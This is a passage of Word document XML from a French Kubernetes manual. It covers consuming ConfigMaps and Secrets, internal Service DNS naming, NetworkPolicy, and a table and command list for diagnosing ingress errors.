          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois modes de consommation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Consommer en variables</w:t>
        <w:br/>
        <w:t>envFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - configMapRef: { name: api-config }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - secretRef:    { name: api-secret }</w:t>
        <w:br/>
        <w:br/>
        <w:t># Consommer une clé précise</w:t>
        <w:br/>
        <w:t>env:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: LOG_LEVEL</w:t>
        <w:br/>
        <w:t xml:space="preserve">    valueFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      configMapKeyRef: { name: api-config, key: LOG_LEVEL }</w:t>
        <w:br/>
        <w:br/>
        <w:t># Consommer en fichier</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: config</w:t>
        <w:br/>
        <w:t xml:space="preserve">    configMap: { name: api-config }</w:t>
        <w:br/>
        <w:t>volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: config</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mountPath: /etc/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    readOnly: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.245 — Quatre modes et leur réactivité</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42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Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Rechargement automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>envFrom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non, au redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ciblé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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322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Une clé précise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui, avec délai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichiers de configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Argument</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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322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Valeur figée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MONTER UN FICHIER SANS ÉCRASER LE RESTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Monter une ConfigMap dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/etc/app</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> masque tout le contenu existant de ce répertoire. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>subPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour un fichier unique, en acceptant de perdre la mise à jour automatique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>67.4 Réseau et DNS interne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque Service obtient un nom DNS interne. Le format varie selon le namespace et le besoin de qualification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois formes de nom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Depuis un pod du même namespace</w:t>
        <w:br/>
        <w:t>curl http://api:80/health</w:t>
        <w:br/>
        <w:br/>
        <w:t># Depuis un autre namespace</w:t>
        <w:br/>
        <w:t>curl http://api.production.svc.cluster.local/health</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la résolution</w:t>
        <w:br/>
        <w:t>kubectl run -it --rm debug --image=alpine --restart=Never -- sh</w:t>
        <w:br/>
        <w:t># nslookup api.production.svc.cluster.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.246 — Quatre formes de nom DNS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86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Nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Résolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api</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Service du namespace courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>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api.production</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Service dans un namespace nommé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api.production.svc</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Forme intermédiaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>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api.production.svc.cluster.local</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Nom complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NetworkPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut restreindre ces communications. Sans politique, tous les pods d'un cluster communiquent librement : c'est un choix par défaut permissif à corriger dès que plusieurs équipes partagent un cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>67.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un 404 et un 503 d'ingress n'ont pas la même signification : le premier concerne le routage, le second le service en amont.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.247 — Six symptômes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69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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Cause probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom d'hôte ou chemin non routé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>describe ingress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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503</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Service sans endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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endpointslices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pod qui refuse la connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> du pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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504</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Pod trop lent</w:t>
            </w:r>
          </w:p>
        </w:tc>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Délais du contrôleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TLS invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret absent ou expiré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>describe ingress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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Redirection infinie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Protocole transmis incorrect</w:t>
            </w:r>
          </w:p>
        </w:tc>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En-têtes du contrôleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes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kubectl describe ingress site -n production | tail -20</w:t>
        <w:br/>
        <w:t>kubectl get endpointslices -n production -o wide</w:t>
        <w:br/>
        <w:t>kubectl logs -n ingress-nginx deploy/ingress-nginx-controller --tail=50</w:t>
        <w:br/>
        <w:t>kubectl get secret exemple-fr-tls -n production</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DIAGNOSTIC D'UN INGRESS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 contrôleur d'ingress est-il installé et exposé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L'objet Ingress utilise-t-il le bon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ingressClassName</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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 service a-t-il des endpoints prêts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Les pods répondent-ils sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>targetPort</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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 DNS pointe-t-il vers le contrôleur ?</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Service fournit un nom et une adresse stables.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sélecteur relie un Service à des pods par étiquettes.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Service sans endpoint renvoie 503.</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Ingress n'a d'effet qu'avec un contrôleur installé.</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pathType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> détermine la correspondance des chemins.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ConfigMap pour le non-sensible, Secret pour le sensible.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Secret est encodé, pas chiffré, par défaut.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volumes de configuration se mettent à jour, les variables non.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
